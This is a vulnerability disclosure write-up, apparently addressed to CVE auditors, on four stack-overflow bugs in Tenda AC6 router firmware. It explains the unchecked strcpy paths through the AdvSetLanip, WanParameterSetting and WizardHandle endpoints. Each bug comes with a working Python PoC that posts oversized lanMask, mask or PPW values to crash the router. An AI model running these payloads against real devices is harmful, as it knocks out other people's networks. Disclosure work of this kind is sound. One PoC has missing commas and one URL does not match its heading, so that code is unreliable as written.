Hello CVE auditer!
Here are some ac6 dos vuln point and pocs :p
thx
infected version
US_AC6V2.0RTL_V15.03.06.50_multi_TDE01.bin
Stack Overflow
fromAdvSetLanip(overflow arg:lanMask)
Vuln point
http://{target_ip}/goform/AdvSetLanip
Vulnerability analysis
We can find the webs form was defined in formDefineTendDa()
in fromAdvSetLanip(),we can control the cp and v11,and v13 is equal to the lan.ip value,which be used soon
then we just need to make v13 not equal to the lan.ip value,so that we can submit lanIp to some wired value ,such as “114.51.41.91”,etc
then we almost got there,we can find the v11(lanMask,user controlable)was transmit to the guest_ip_check function as argument 2
because the guest_ip_check() function a2 point to our controlable arg: lanMask,which can input infinite length words
initIpAddrInfo() also use our input as a2,however
we can clearly see that the a2 being strcpy into the a4 area directly,without any length check,it is dangerous for stack ra register,and where is the a4 area?
when we go back to guest_ip_check ,we can find that the a4 area is point to this function’s stack,which called v5
In summary,we need to commit these values:
“lanMask”: payload, “lanIp”: “114.51.41.91” (or something else:p)
PoC
def exp_AdvSetLanip(target_ip, cookie):
url = f"http://{target_ip}/goform/AdvSetLanip"
payload = b'a'*(0x30) + b'bbbb\x00'
data = {
"lanMask":payload,
"lanIp": "114.5.14.19"
}
response = requests.post(url, cookies={'Cookie': cookie}, data=data)
Demo
setDoublePppoeConfig->guest_ip_check(overflow arg: mask)
Vuln point
http://{target_ip}/goform/WanParameterSetting
Vulnerability analysis
We can find the webs form was defined in formDefineTendDa()
in formWanParameterSetting(),it quote the formWanInfoSet() function,which we even not have to contorl the wan1 to get in(because the default value of module is wan1)
then,formWanInfoSet() have a control point which we can control the wanType argument into “5”,then the v3 will be (int)”5″
so that we can get in this brench,which call the vulnerable function setDoublePppoeConfig()
then we get into it
we need to control the vpnWanType = 0
then we can use staticIp to overflow the stack
because the guest_ip_check() function a2 point to our controlable arg: mask,which can input infinite length words
initIpAddrInfo() also use our input as a2,however
we can clearly see that the a2 being strcpy into the a4 area directly,without any length check,it is dangerous for stack ra register,and where is the a4 area?
when we go back to guest_ip_check ,we can find that the a4 area is point to this function’s stack,which called v5
In summary,we need to commit these values:
wanType:5 vpnWanType:0 mask:payload
PoC
def exp_setDoublePppoeConfig(target_ip, cookie):
url = f"http://{target_ip}/goform/WanParameterSetting"
payload = b'a'*(0x920) + b'bbbb\x00'
data = {
"wanType":5,
"vpnWanType":0,
"mask":payload
}
response = requests.post(url, cookies=cookie, data=data)
Demo
setDoubleL2tpConfig->guest_ip_check(overflow arg: mask)
Vuln point
http://{target_ip}/goform/formWanParameterSetting
Vulnerability analysis
We can find the webs form was defined in formDefineTendDa()
in formWanParameterSetting(),it quote the formWanInfoSet() function,which we even not have to contorl the wan1 to get in(because the default value of module is wan1)
then,formWanInfoSet() have a control point which we can control the wanType argument into “4”,then the v3 will be (int)”4″
so that we can get in this brench,which call the vulnerable function setDoubleL2tpConfig()
then we get into it
we need to control the vpnWanType(v11) = 0,and v7(mask) which is delived to guest_ip_check()
then we can use staticIp to overflow the stack
because the guest_ip_check() function a2 point to our controlable arg: mask,which can input infinite length words
initIpAddrInfo() also use our input as a2,however
we can clearly see that the a2 being strcpy into the a4 area directly,without any length check,it is dangerous for stack ra register,and where is the a4 area?
when we go back to guest_ip_check ,we can find that the a4 area is point to this function’s stack,which called v5
PoC
def exp_setDoubleL2tpConfig(target_ip, cookie):
url = f"http://{target_ip}/goform/WanParameterSetting"
payload = b'a'*(0x920) + b'bbbb\x00'
data = {
"wanType":4
"vpnWanType":0
"mask":payload
}
response = requests.post(url, cookies={'Cookie': cookie}, data=data)
Demo
fromWizardHandle(dos)
Vuln point
http://{target_ip}/goform/WizardHandle
Vulnerability analysis
We can find the webs form was defined in formDefineTendDa()
case2 get var from web request value:PPW
then commit PPW pointer to decodePwd
decodePwd just a danger designed function,which copy allthings in a1 to a2 without checking length
so the v54 stack area is in danger,we can use PPW to overflow it
however,here are so many valuable block between the overflow value and ra
and we overflow the a0 place,which need point to a valid number ascii word to delieve to the atoi first argument
so atoi will be fially segmentation fault
Poc
def exp_WizardHandle(target_ip, cookie):
url = f"http://{target_ip}/goform/WizardHandle"
payload = b'\x76'*(0x16C) + b'bbbb\x00'
data = {
"WANT":2,
"PPW": payload
}
response = requests.post(url, cookies={'Cookie': cookie}, data=data)